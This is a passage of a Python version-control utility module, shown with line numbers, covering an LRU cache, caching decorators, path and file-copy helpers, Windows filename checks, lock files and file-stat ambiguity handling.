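#   with acceptintervention(tr):
#       applypatches()        # may raise error.InterventionRequired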
1193 1198 @contextlib.contextmanager
1194 1199 def nullcontextmanager():
1195 1200 yield
1196 1201
1197 1202 class _lrucachenode(object):
1198 1203 """A node in a doubly linked list.
1199 1204
1200 1205 Holds a reference to nodes on either side as well as a key-value
1201 1206 pair for the dictionary entry.
1202 1207 """
1203 1208 __slots__ = (u'next', u'prev', u'key', u'value')
1204 1209
1205 1210 def __init__(self):
1206 1211 self.next = None
1207 1212 self.prev = None
1208 1213
1209 1214 self.key = _notset
1210 1215 self.value = None
1211 1216
1212 1217 def markempty(self):
1213 1218 """Mark the node as emptied."""
1214 1219 self.key = _notset
1215 1220
1216 1221 class lrucachedict(object):
1217 1222 """Dict that caches most recent accesses and sets.
1218 1223
1219 1224 The dict consists of an actual backing dict - indexed by original
1220 1225 key - and a doubly linked circular list defining the order of entries in
1221 1226 the cache.
1222 1227
1223 1228 The head node is the newest entry in the cache. If the cache is full,
1224 1229 we recycle head.prev and make it the new head. Cache accesses result in
1225 1230 the node being moved to before the existing head and being marked as the
1226 1231 new head node.
1227 1232 """
1228 1233 def __init__(self, max):
1229 1234 self._cache = {}
1230 1235
1231 1236 self._head = head = _lrucachenode()
1232 1237 head.prev = head
1233 1238 head.next = head
1234 1239 self._size = 1
1235 1240 self._capacity = max
1236 1241
1237 1242 def __len__(self):
1238 1243 return len(self._cache)
1239 1244
1240 1245 def __contains__(self, k):
1241 1246 return k in self._cache
1242 1247
1243 1248 def __iter__(self):
1244 1249 # We don't have to iterate in cache order, but why not.
1245 1250 n = self._head
1246 1251 for i in range(len(self._cache)):
1247 1252 yield n.key
1248 1253 n = n.next
1249 1254
1250 1255 def __getitem__(self, k):
1251 1256 node = self._cache[k]
1252 1257 self._movetohead(node)
1253 1258 return node.value
1254 1259
1255 1260 def __setitem__(self, k, v):
1256 1261 node = self._cache.get(k)
1257 1262 # Replace existing value and mark as newest.
1258 1263 if node is not None:
1259 1264 node.value = v
1260 1265 self._movetohead(node)
1261 1266 return
1262 1267
1263 1268 if self._size < self._capacity:
1264 1269 node = self._addcapacity()
1265 1270 else:
1266 1271 # Grab the last/oldest item.
1267 1272 node = self._head.prev
1268 1273
1269 1274 # At capacity. Kill the old entry.
1270 1275 if node.key is not _notset:
1271 1276 del self._cache[node.key]
1272 1277
1273 1278 node.key = k
1274 1279 node.value = v
1275 1280 self._cache[k] = node
1276 1281 # And mark it as newest entry. No need to adjust order since it
1277 1282 # is already self._head.prev.
1278 1283 self._head = node
1279 1284
1280 1285 def __delitem__(self, k):
1281 1286 node = self._cache.pop(k)
1282 1287 node.markempty()
1283 1288
1284 1289 # Temporarily mark as newest item before re-adjusting head to make
1285 1290 # this node the oldest item.
1286 1291 self._movetohead(node)
1287 1292 self._head = node.next
1288 1293
1289 1294 # Additional dict methods.
1290 1295
1291 1296 def get(self, k, default=None):
1292 1297 try:
1293 1298 return self._cache[k].value
1294 1299 except KeyError:
1295 1300 return default
1296 1301
1297 1302 def clear(self):
1298 1303 n = self._head
1299 1304 while n.key is not _notset:
1300 1305 n.markempty()
1301 1306 n = n.next
1302 1307
1303 1308 self._cache.clear()
1304 1309
1305 1310 def copy(self):
1306 1311 result = lrucachedict(self._capacity)
1307 1312 n = self._head.prev
1308 1313 # Iterate in oldest-to-newest order, so the copy has the right ordering
1309 1314 for i in range(len(self._cache)):
1310 1315 result[n.key] = n.value
1311 1316 n = n.prev
1312 1317 return result
1313 1318
1314 1319 def _movetohead(self, node):
1315 1320 """Mark a node as the newest, making it the new head.
1316 1321
1317 1322 When a node is accessed, it becomes the freshest entry in the LRU
1318 1323 list, which is denoted by self._head.
1319 1324
1320 1325 Visually, let's make ``N`` the new head node (* denotes head):
1321 1326
1322 1327 previous/oldest <-> head <-> next/next newest
1323 1328
1324 1329 ----<->--- A* ---<->-----
1325 1330 | |
1326 1331 E <-> D <-> N <-> C <-> B
1327 1332
1328 1333 To:
1329 1334
1330 1335 ----<->--- N* ---<->-----
1331 1336 | |
1332 1337 E <-> D <-> C <-> B <-> A
1333 1338
1334 1339 This requires the following moves:
1335 1340
1336 1341 C.next = D (node.prev.next = node.next)
1337 1342 D.prev = C (node.next.prev = node.prev)
1338 1343 E.next = N (head.prev.next = node)
1339 1344 N.prev = E (node.prev = head.prev)
1340 1345 N.next = A (node.next = head)
1341 1346 A.prev = N (head.prev = node)
1342 1347 """
1343 1348 head = self._head
1344 1349 # C.next = D
1345 1350 node.prev.next = node.next
1346 1351 # D.prev = C
1347 1352 node.next.prev = node.prev
1348 1353 # N.prev = E
1349 1354 node.prev = head.prev
1350 1355 # N.next = A
1351 1356         # It is tempting to simply use "head" here; however, if node is
1352 1357         # adjacent to head, this will do bad things.
1353 1358 node.next = head.prev.next
1354 1359 # E.next = N
1355 1360 node.next.prev = node
1356 1361 # A.prev = N
1357 1362 node.prev.next = node
1358 1363
1359 1364 self._head = node
1360 1365
1361 1366 def _addcapacity(self):
1362 1367 """Add a node to the circular linked list.
1363 1368
1364 1369 The new node is inserted before the head node.
1365 1370 """
1366 1371 head = self._head
1367 1372 node = _lrucachenode()
1368 1373 head.prev.next = node
1369 1374 node.prev = head.prev
1370 1375 node.next = head
1371 1376 head.prev = node
1372 1377 self._size += 1
1373 1378 return node
1374 1379
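# Usage sketch: with capacity 2, inserting a third key recycles the oldest
# node; a read counts as a use and protects its key from eviction.
#
#   >>> d = lrucachedict(2)
#   >>> d[b'a'] = 1
#   >>> d[b'b'] = 2
#   >>> d[b'a']               # touch b'a' so b'b' becomes the oldest entry
#   1
#   >>> d[b'c'] = 3           # evicts b'b'
#   >>> b'b' in d
#   False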
1375 1380 def lrucachefunc(func):
1376 1381 '''cache most recent results of function calls'''
1377 1382 cache = {}
1378 1383 order = collections.deque()
1379 1384 if func.__code__.co_argcount == 1:
1380 1385 def f(arg):
1381 1386 if arg not in cache:
1382 1387 if len(cache) > 20:
1383 1388 del cache[order.popleft()]
1384 1389 cache[arg] = func(arg)
1385 1390 else:
1386 1391 order.remove(arg)
1387 1392 order.append(arg)
1388 1393 return cache[arg]
1389 1394 else:
1390 1395 def f(*args):
1391 1396 if args not in cache:
1392 1397 if len(cache) > 20:
1393 1398 del cache[order.popleft()]
1394 1399 cache[args] = func(*args)
1395 1400 else:
1396 1401 order.remove(args)
1397 1402 order.append(args)
1398 1403 return cache[args]
1399 1404
1400 1405 return f
1401 1406
1402 1407 class propertycache(object):
1403 1408 def __init__(self, func):
1404 1409 self.func = func
1405 1410 self.name = func.__name__
1406 1411 def __get__(self, obj, type=None):
1407 1412 result = self.func(obj)
1408 1413 self.cachevalue(obj, result)
1409 1414 return result
1410 1415
1411 1416 def cachevalue(self, obj, value):
1412 1417 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1413 1418 obj.__dict__[self.name] = value
1414 1419
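# Usage sketch (``repoinfo`` is a hypothetical class): the decorated method
# runs once per instance; cachevalue() stores the result in the instance
# __dict__ under the same name, which shadows this non-data descriptor on
# all later reads.
#
#   >>> class repoinfo(object):
#   ...     @propertycache
#   ...     def expensive(self):
#   ...         print('computing')
#   ...         return 42
#   >>> r = repoinfo()
#   >>> r.expensive
#   computing
#   42
#   >>> r.expensive
#   42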
1415 1420 def clearcachedproperty(obj, prop):
1416 1421 '''clear a cached property value, if one has been set'''
1417 1422 if prop in obj.__dict__:
1418 1423 del obj.__dict__[prop]
1419 1424
1420 1425 def increasingchunks(source, min=1024, max=65536):
1421 1426 '''return no less than min bytes per chunk while data remains,
1422 1427 doubling min after each chunk until it reaches max'''
1423 1428 def log2(x):
1424 1429 if not x:
1425 1430 return 0
1426 1431 i = 0
1427 1432 while x:
1428 1433 x >>= 1
1429 1434 i += 1
1430 1435 return i - 1
1431 1436
1432 1437 buf = []
1433 1438 blen = 0
1434 1439 for chunk in source:
1435 1440 buf.append(chunk)
1436 1441 blen += len(chunk)
1437 1442 if blen >= min:
1438 1443 if min < max:
1439 1444 min = min << 1
1440 1445 nmin = 1 << log2(blen)
1441 1446 if nmin > min:
1442 1447 min = nmin
1443 1448 if min > max:
1444 1449 min = max
1445 1450 yield ''.join(buf)
1446 1451 blen = 0
1447 1452 buf = []
1448 1453 if buf:
1449 1454 yield ''.join(buf)
1450 1455
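# Worked example: feeding twenty 512-byte chunks, the emitted chunks grow
# from ``min`` toward ``max`` and then stay capped, with the remainder
# flushed at the end.
#
#   >>> chunks = increasingchunks([b'x' * 512] * 20, min=1024, max=4096)
#   >>> [len(c) for c in chunks]
#   [1024, 2048, 4096, 3072]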
1451 1456 def always(fn):
1452 1457 return True
1453 1458
1454 1459 def never(fn):
1455 1460 return False
1456 1461
1457 1462 def nogc(func):
1458 1463 """disable garbage collector
1459 1464
1460 1465 Python's garbage collector triggers a GC each time a certain number of
1461 1466 container objects (the number being defined by gc.get_threshold()) are
1462 1467 allocated even when marked not to be tracked by the collector. Tracking has
1463 1468 no effect on when GCs are triggered, only on what objects the GC looks
1464 1469 into. As a workaround, disable GC while building complex (huge)
1465 1470 containers.
1466 1471
1467 1472     This garbage collector issue has been fixed in 2.7, but it still affects
1468 1473     CPython's performance.
1469 1474 """
1470 1475 def wrapper(*args, **kwargs):
1471 1476 gcenabled = gc.isenabled()
1472 1477 gc.disable()
1473 1478 try:
1474 1479 return func(*args, **kwargs)
1475 1480 finally:
1476 1481 if gcenabled:
1477 1482 gc.enable()
1478 1483 return wrapper
1479 1484
1480 1485 if pycompat.ispypy:
1481 1486 # PyPy runs slower with gc disabled
1482 1487 nogc = lambda x: x
1483 1488
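# Usage sketch (``buildmap`` is a hypothetical function): decorate builders
# of large container graphs so a GC pass cannot fire mid-construction.
#
#   >>> @nogc
#   ... def buildmap(n):
#   ...     return dict((i, i + 1) for i in range(n))
#   >>> len(buildmap(1000))
#   1000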
1484 1489 def pathto(root, n1, n2):
1485 1490 '''return the relative path from one place to another.
1486 1491 root should use os.sep to separate directories
1487 1492 n1 should use os.sep to separate directories
1488 1493 n2 should use "/" to separate directories
1489 1494 returns an os.sep-separated path.
1490 1495
1491 1496 If n1 is a relative path, it's assumed it's
1492 1497 relative to root.
1493 1498 n2 should always be relative to root.
1494 1499 '''
1495 1500 if not n1:
1496 1501 return localpath(n2)
1497 1502 if os.path.isabs(n1):
1498 1503 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1499 1504 return os.path.join(root, localpath(n2))
1500 1505 n2 = '/'.join((pconvert(root), n2))
1501 1506 a, b = splitpath(n1), n2.split('/')
1502 1507 a.reverse()
1503 1508 b.reverse()
1504 1509 while a and b and a[-1] == b[-1]:
1505 1510 a.pop()
1506 1511 b.pop()
1507 1512 b.reverse()
1508 1513 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1509 1514
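# Worked example (assuming POSIX separators): from 'a/b' inside the root to
# 'c/d', the walk climbs two levels and descends into 'c/d'.
#
#   >>> pathto(b'/repo', b'a/b', b'c/d')
#   '../../c/d'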
1510 1515 # the location of data files matching the source code
1511 1516 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1512 1517 # executable version (py2exe) doesn't support __file__
1513 1518 datapath = os.path.dirname(pycompat.sysexecutable)
1514 1519 else:
1515 1520 datapath = os.path.dirname(pycompat.fsencode(__file__))
1516 1521
1517 1522 i18n.setdatapath(datapath)
1518 1523
1519 1524 def checksignature(func):
1520 1525 '''wrap a function with code to check for calling errors'''
1521 1526 def check(*args, **kwargs):
1522 1527 try:
1523 1528 return func(*args, **kwargs)
1524 1529 except TypeError:
1525 1530 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1526 1531 raise error.SignatureError
1527 1532 raise
1528 1533
1529 1534 return check
1530 1535
1531 1536 # a whitelist of known filesystems where hardlinks work reliably
1532 1537 _hardlinkfswhitelist = {
1533 1538 'apfs',
1534 1539 'btrfs',
1535 1540 'ext2',
1536 1541 'ext3',
1537 1542 'ext4',
1538 1543 'hfs',
1539 1544 'jfs',
1540 1545 'NTFS',
1541 1546 'reiserfs',
1542 1547 'tmpfs',
1543 1548 'ufs',
1544 1549 'xfs',
1545 1550 'zfs',
1546 1551 }
1547 1552
1548 1553 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1549 1554 '''copy a file, preserving mode and optionally other stat info like
1550 1555 atime/mtime
1551 1556
1552 1557 checkambig argument is used with filestat, and is useful only if
1553 1558 destination file is guarded by any lock (e.g. repo.lock or
1554 1559 repo.wlock).
1555 1560
1556 1561 copystat and checkambig should be exclusive.
1557 1562 '''
1558 1563 assert not (copystat and checkambig)
1559 1564 oldstat = None
1560 1565 if os.path.lexists(dest):
1561 1566 if checkambig:
1562 1567             oldstat = filestat.frompath(dest)
1563 1568 unlink(dest)
1564 1569 if hardlink:
1565 1570 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1566 1571 # unless we are confident that dest is on a whitelisted filesystem.
1567 1572 try:
1568 1573 fstype = getfstype(os.path.dirname(dest))
1569 1574 except OSError:
1570 1575 fstype = None
1571 1576 if fstype not in _hardlinkfswhitelist:
1572 1577 hardlink = False
1573 1578 if hardlink:
1574 1579 try:
1575 1580 oslink(src, dest)
1576 1581 return
1577 1582 except (IOError, OSError):
1578 1583 pass # fall back to normal copy
1579 1584 if os.path.islink(src):
1580 1585 os.symlink(os.readlink(src), dest)
1581 1586 # copytime is ignored for symlinks, but in general copytime isn't needed
1582 1587 # for them anyway
1583 1588 else:
1584 1589 try:
1585 1590 shutil.copyfile(src, dest)
1586 1591 if copystat:
1587 1592 # copystat also copies mode
1588 1593 shutil.copystat(src, dest)
1589 1594 else:
1590 1595 shutil.copymode(src, dest)
1591 1596 if oldstat and oldstat.stat:
1592 1597 newstat = filestat.frompath(dest)
1593 1598 if newstat.isambig(oldstat):
1594 1599 # stat of copied file is ambiguous to original one
1595 1600 advanced = (
1596 1601 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1597 1602 os.utime(dest, (advanced, advanced))
1598 1603 except shutil.Error as inst:
1599 1604 raise error.Abort(str(inst))
1600 1605
1601 1606 def copyfiles(src, dst, hardlink=None, progress=None):
1602 1607 """Copy a directory tree using hardlinks if possible."""
1603 1608 num = 0
1604 1609
1605 1610 def settopic():
1606 1611 if progress:
1607 1612 progress.topic = _('linking') if hardlink else _('copying')
1608 1613
1609 1614 if os.path.isdir(src):
1610 1615 if hardlink is None:
1611 1616 hardlink = (os.stat(src).st_dev ==
1612 1617 os.stat(os.path.dirname(dst)).st_dev)
1613 1618 settopic()
1614 1619 os.mkdir(dst)
1615 1620 for name, kind in listdir(src):
1616 1621 srcname = os.path.join(src, name)
1617 1622 dstname = os.path.join(dst, name)
1618 1623 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1619 1624 num += n
1620 1625 else:
1621 1626 if hardlink is None:
1622 1627 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1623 1628 os.stat(os.path.dirname(dst)).st_dev)
1624 1629 settopic()
1625 1630
1626 1631 if hardlink:
1627 1632 try:
1628 1633 oslink(src, dst)
1629 1634 except (IOError, OSError):
1630 1635 hardlink = False
1631 1636 shutil.copy(src, dst)
1632 1637 else:
1633 1638 shutil.copy(src, dst)
1634 1639 num += 1
1635 1640 if progress:
1636 1641 progress.increment()
1637 1642
1638 1643 return hardlink, num
1639 1644
1640 1645 _winreservednames = {
1641 1646 'con', 'prn', 'aux', 'nul',
1642 1647 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1643 1648 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1644 1649 }
1645 1650 _winreservedchars = ':*?"<>|'
1646 1651 def checkwinfilename(path):
1647 1652 r'''Check that the base-relative path is a valid filename on Windows.
1648 1653 Returns None if the path is ok, or a UI string describing the problem.
1649 1654
1650 1655 >>> checkwinfilename(b"just/a/normal/path")
1651 1656 >>> checkwinfilename(b"foo/bar/con.xml")
1652 1657 "filename contains 'con', which is reserved on Windows"
1653 1658 >>> checkwinfilename(b"foo/con.xml/bar")
1654 1659 "filename contains 'con', which is reserved on Windows"
1655 1660 >>> checkwinfilename(b"foo/bar/xml.con")
1656 1661 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1657 1662 "filename contains 'AUX', which is reserved on Windows"
1658 1663 >>> checkwinfilename(b"foo/bar/bla:.txt")
1659 1664 "filename contains ':', which is reserved on Windows"
1660 1665 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1661 1666 "filename contains '\\x07', which is invalid on Windows"
1662 1667 >>> checkwinfilename(b"foo/bar/bla ")
1663 1668 "filename ends with ' ', which is not allowed on Windows"
1664 1669 >>> checkwinfilename(b"../bar")
1665 1670 >>> checkwinfilename(b"foo\\")
1666 1671 "filename ends with '\\', which is invalid on Windows"
1667 1672 >>> checkwinfilename(b"foo\\/bar")
1668 1673 "directory name ends with '\\', which is invalid on Windows"
1669 1674 '''
1670 1675 if path.endswith('\\'):
1671 1676 return _("filename ends with '\\', which is invalid on Windows")
1672 1677 if '\\/' in path:
1673 1678 return _("directory name ends with '\\', which is invalid on Windows")
1674 1679 for n in path.replace('\\', '/').split('/'):
1675 1680 if not n:
1676 1681 continue
1677 1682 for c in _filenamebytestr(n):
1678 1683 if c in _winreservedchars:
1679 1684 return _("filename contains '%s', which is reserved "
1680 1685 "on Windows") % c
1681 1686 if ord(c) <= 31:
1682 1687 return _("filename contains '%s', which is invalid "
1683 1688 "on Windows") % stringutil.escapestr(c)
1684 1689 base = n.split('.')[0]
1685 1690 if base and base.lower() in _winreservednames:
1686 1691 return _("filename contains '%s', which is reserved "
1687 1692 "on Windows") % base
1688 1693 t = n[-1:]
1689 1694 if t in '. ' and n not in '..':
1690 1695 return _("filename ends with '%s', which is not allowed "
1691 1696 "on Windows") % t
1692 1697
1693 1698 if pycompat.iswindows:
1694 1699 checkosfilename = checkwinfilename
1695 1700 timer = time.clock
1696 1701 else:
1697 1702 checkosfilename = platform.checkosfilename
1698 1703 timer = time.time
1699 1704
1700 1705 if safehasattr(time, "perf_counter"):
1701 1706 timer = time.perf_counter
1702 1707
1703 1708 def makelock(info, pathname):
1704 1709 """Create a lock file atomically if possible
1705 1710
1706 1711     This may leave a stale lock file if symlinks aren't supported and
1707 1712     signal interrupts are enabled.
1708 1713 """
1709 1714 try:
1710 1715 return os.symlink(info, pathname)
1711 1716 except OSError as why:
1712 1717 if why.errno == errno.EEXIST:
1713 1718 raise
1714 1719 except AttributeError: # no symlink in os
1715 1720 pass
1716 1721
1717 1722 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1718 1723 ld = os.open(pathname, flags)
1719 1724 os.write(ld, info)
1720 1725 os.close(ld)
1721 1726
1722 1727 def readlock(pathname):
1723 1728 try:
1724 1729 return os.readlink(pathname)
1725 1730 except OSError as why:
1726 1731 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1727 1732 raise
1728 1733 except AttributeError: # no symlink in os
1729 1734 pass
1730 1735 fp = posixfile(pathname, 'rb')
1731 1736 r = fp.read()
1732 1737 fp.close()
1733 1738 return r
1734 1739
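# Usage sketch (assuming a symlink-capable platform and a writable
# directory): the lock content travels in the symlink target, so creation
# is a single atomic syscall and readlock() recovers it without opening a
# file.
#
#   >>> import tempfile
#   >>> lockname = os.path.join(tempfile.mkdtemp(), 'lock')
#   >>> makelock(b'hostname:12345', lockname)
#   >>> readlock(lockname)
#   'hostname:12345'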
1735 1740 def fstat(fp):
1736 1741 '''stat file object that may not have fileno method.'''
1737 1742 try:
1738 1743 return os.fstat(fp.fileno())
1739 1744 except AttributeError:
1740 1745 return os.stat(fp.name)
1741 1746
1742 1747 # File system features
1743 1748
1744 1749 def fscasesensitive(path):
1745 1750 """
1746 1751 Return true if the given path is on a case-sensitive filesystem
1747 1752
1748 1753 Requires a path (like /foo/.hg) ending with a foldable final
1749 1754 directory component.
1750 1755 """
1751 1756 s1 = os.lstat(path)
1752 1757 d, b = os.path.split(path)
1753 1758 b2 = b.upper()
1754 1759 if b == b2:
1755 1760 b2 = b.lower()
1756 1761 if b == b2:
1757 1762 return True # no evidence against case sensitivity
1758 1763 p2 = os.path.join(d, b2)
1759 1764 try:
1760 1765 s2 = os.lstat(p2)
1761 1766 if s2 == s1:
1762 1767 return False
1763 1768 return True
1764 1769 except OSError:
1765 1770 return True
1766 1771
1767 1772 try:
1768 1773 import re2
1769 1774 _re2 = None
1770 1775 except ImportError:
1771 1776 _re2 = False
1772 1777
1773 1778 class _re(object):
1774 1779 def _checkre2(self):
1775 1780 global _re2
1776 1781 try:
1777 1782 # check if match works, see issue3964
1778 1783 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1779 1784 except ImportError:
1780 1785 _re2 = False
1781 1786
1782 1787 def compile(self, pat, flags=0):
1783 1788 '''Compile a regular expression, using re2 if possible
1784 1789
1785 1790 For best performance, use only re2-compatible regexp features. The
1786 1791 only flags from the re module that are re2-compatible are
1787 1792 IGNORECASE and MULTILINE.'''
1788 1793 if _re2 is None:
1789 1794 self._checkre2()
1790 1795 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1791 1796 if flags & remod.IGNORECASE:
1792 1797 pat = '(?i)' + pat
1793 1798 if flags & remod.MULTILINE:
1794 1799 pat = '(?m)' + pat
1795 1800 try:
1796 1801 return re2.compile(pat)
1797 1802 except re2.error:
1798 1803 pass
1799 1804 return remod.compile(pat, flags)
1800 1805
1801 1806 @propertycache
1802 1807 def escape(self):
1803 1808 '''Return the version of escape corresponding to self.compile.
1804 1809
1805 1810 This is imperfect because whether re2 or re is used for a particular
1806 1811 function depends on the flags, etc, but it's the best we can do.
1807 1812 '''
1808 1813 global _re2
1809 1814 if _re2 is None:
1810 1815 self._checkre2()
1811 1816 if _re2:
1812 1817 return re2.escape
1813 1818 else:
1814 1819 return remod.escape
1815 1820
1816 1821 re = _re()
1817 1822
1818 1823 _fspathcache = {}
1819 1824 def fspath(name, root):
1820 1825 '''Get name in the case stored in the filesystem
1821 1826
1822 1827 The name should be relative to root, and be normcase-ed for efficiency.
1823 1828
1824 1829 Note that this function is unnecessary, and should not be
1825 1830 called, for case-sensitive filesystems (simply because it's expensive).
1826 1831
1827 1832 The root should be normcase-ed, too.
1828 1833 '''
1829 1834 def _makefspathcacheentry(dir):
1830 1835 return dict((normcase(n), n) for n in os.listdir(dir))
1831 1836
1832 1837 seps = pycompat.ossep
1833 1838 if pycompat.osaltsep:
1834 1839 seps = seps + pycompat.osaltsep
1835 1840 # Protect backslashes. This gets silly very quickly.
1836 1841     seps = seps.replace('\\', '\\\\')
1837 1842 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1838 1843 dir = os.path.normpath(root)
1839 1844 result = []
1840 1845 for part, sep in pattern.findall(name):
1841 1846 if sep:
1842 1847 result.append(sep)
1843 1848 continue
1844 1849
1845 1850 if dir not in _fspathcache:
1846 1851 _fspathcache[dir] = _makefspathcacheentry(dir)
1847 1852 contents = _fspathcache[dir]
1848 1853
1849 1854 found = contents.get(part)
1850 1855 if not found:
1851 1856             # retry "once per directory" per "dirstate.walk" which
1852 1857             # may take place for each patch of "hg qpush", for example
1853 1858 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1854 1859 found = contents.get(part)
1855 1860
1856 1861 result.append(found or part)
1857 1862 dir = os.path.join(dir, part)
1858 1863
1859 1864 return ''.join(result)
1860 1865
1861 1866 def checknlink(testfile):
1862 1867 '''check whether hardlink count reporting works properly'''
1863 1868
1864 1869 # testfile may be open, so we need a separate file for checking to
1865 1870 # work around issue2543 (or testfile may get lost on Samba shares)
1866 1871 f1, f2, fp = None, None, None
1867 1872 try:
1868 1873 fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1869 1874 suffix='1~', dir=os.path.dirname(testfile))
1870 1875 os.close(fd)
1871 1876 f2 = '%s2~' % f1[:-2]
1872 1877
1873 1878 oslink(f1, f2)
1874 1879 # nlinks() may behave differently for files on Windows shares if
1875 1880 # the file is open.
1876 1881 fp = posixfile(f2)
1877 1882 return nlinks(f2) > 1
1878 1883 except OSError:
1879 1884 return False
1880 1885 finally:
1881 1886 if fp is not None:
1882 1887 fp.close()
1883 1888 for f in (f1, f2):
1884 1889 try:
1885 1890 if f is not None:
1886 1891 os.unlink(f)
1887 1892 except OSError:
1888 1893 pass
1889 1894
1890 1895 def endswithsep(path):
1891 1896 '''Check path ends with os.sep or os.altsep.'''
1892 1897 return (path.endswith(pycompat.ossep)
1893 1898 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1894 1899
1895 1900 def splitpath(path):
1896 1901 '''Split path by os.sep.
1897 1902     Note that this function does not use os.altsep because this is
1898 1903     an alternative to a simple "xxx.split(os.sep)".
1899 1904     It is recommended to use os.path.normpath() before using this
1900 1905     function if needed.'''
1901 1906 return path.split(pycompat.ossep)
1902 1907
1903 1908 def mktempcopy(name, emptyok=False, createmode=None):
1904 1909 """Create a temporary file with the same contents from name
1905 1910
1906 1911 The permission bits are copied from the original file.
1907 1912
1908 1913 If the temporary file is going to be truncated immediately, you
1909 1914 can use emptyok=True as an optimization.
1910 1915
1911 1916 Returns the name of the temporary file.
1912 1917 """
1913 1918 d, fn = os.path.split(name)
1914 1919 fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1915 1920 os.close(fd)
1916 1921 # Temporary files are created with mode 0600, which is usually not
1917 1922 # what we want. If the original file already exists, just copy
1918 1923 # its mode. Otherwise, manually obey umask.
1919 1924 copymode(name, temp, createmode)
1920 1925 if emptyok:
1921 1926 return temp
1922 1927 try:
1923 1928 try:
1924 1929 ifp = posixfile(name, "rb")
1925 1930 except IOError as inst:
1926 1931 if inst.errno == errno.ENOENT:
1927 1932 return temp
1928 1933 if not getattr(inst, 'filename', None):
1929 1934 inst.filename = name
1930 1935 raise
1931 1936 ofp = posixfile(temp, "wb")
1932 1937 for chunk in filechunkiter(ifp):
1933 1938 ofp.write(chunk)
1934 1939 ifp.close()
1935 1940 ofp.close()
1936 1941 except: # re-raises
1937 1942 try:
1938 1943 os.unlink(temp)
1939 1944 except OSError:
1940 1945 pass
1941 1946 raise
1942 1947 return temp
1943 1948
1944 1949 class filestat(object):
1945 1950 """help to exactly detect change of a file
1946 1951
1947 1952     The 'stat' attribute is the result of 'os.stat()' if the specified
1948 1953     'path' exists; otherwise, it is None. This saves callers a
1949 1954     preparatory 'exists()' check.
1950 1955 """
1951 1956 def __init__(self, stat):
1952 1957 self.stat = stat
1953 1958
1954 1959 @classmethod
1955 1960 def frompath(cls, path):
1956 1961 try:
1957 1962 stat = os.stat(path)
1958 1963 except OSError as err:
1959 1964 if err.errno != errno.ENOENT:
1960 1965 raise
1961 1966 stat = None
1962 1967 return cls(stat)
1963 1968
1964 1969 @classmethod
1965 1970 def fromfp(cls, fp):
1966 1971 stat = os.fstat(fp.fileno())
1967 1972 return cls(stat)
1968 1973
1969 1974 __hash__ = object.__hash__
1970 1975
1971 1976 def __eq__(self, old):
1972 1977 try:
1973 1978 # if ambiguity between stat of new and old file is
1974 1979 # avoided, comparison of size, ctime and mtime is enough
1975 1980 # to exactly detect change of a file regardless of platform
1976 1981 return (self.stat.st_size == old.stat.st_size and
1977 1982 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1978 1983 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1979 1984 except AttributeError:
1980 1985 pass
1981 1986 try:
1982 1987 return self.stat is None and old.stat is None
1983 1988 except AttributeError:
1984 1989 return False
1985 1990
1986 1991 def isambig(self, old):
1987 1992 """Examine whether new (= self) stat is ambiguous against old one
1988 1993
1989 1994 "S[N]" below means stat of a file at N-th change:
1990 1995
1991 1996 - S[n-1].ctime < S[n].ctime: can detect change of a file
1992 1997 - S[n-1].ctime == S[n].ctime
1993 1998 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1994 1999 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1995 2000 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1996 2001 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1997 2002
1998 2003         Case (*2) above means that a file was changed twice or more
1999 2004         within the same second (= S[n-1].ctime), so comparing timestamps
2000 2005         is ambiguous.
2001 2006
2002 2007         The basic idea for avoiding such ambiguity is to "advance mtime
2003 2008         by 1 second, if the timestamp is ambiguous".
2004 2009
2005 2010 But advancing mtime only in case (*2) doesn't work as
2006 2011 expected, because naturally advanced S[n].mtime in case (*1)
2007 2012 might be equal to manually advanced S[n-1 or earlier].mtime.
2008 2013
2009 2014         Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2010 2015         treated as ambiguous regardless of mtime, to avoid overlooking
2011 2016         a change masked by such colliding mtimes.
2012 2017
2013 2018 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2014 2019 S[n].mtime", even if size of a file isn't changed.
2015 2020 """
2016 2021 try:
2017 2022 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2018 2023 except AttributeError:
2019 2024 return False
2020 2025
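    # Worked example for the rule above: if the old stat has
    # ctime == mtime == 100 and the file is rewritten within the same
    # second, the new stat also has ctime == 100, so isambig() is True
    # even though the contents differ. avoidambig() then sets mtime to
    # (100 + 1) & 0x7fffffff == 101, making the two generations
    # distinguishable by mtime.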
2021 2026 def avoidambig(self, path, old):
2022 2027 """Change file stat of specified path to avoid ambiguity
2023 2028
2024 2029 'old' should be previous filestat of 'path'.
2025 2030
2026 2031         Avoiding ambiguity is skipped if the process doesn't have
2027 2032         appropriate privileges for 'path'; in that case this returns
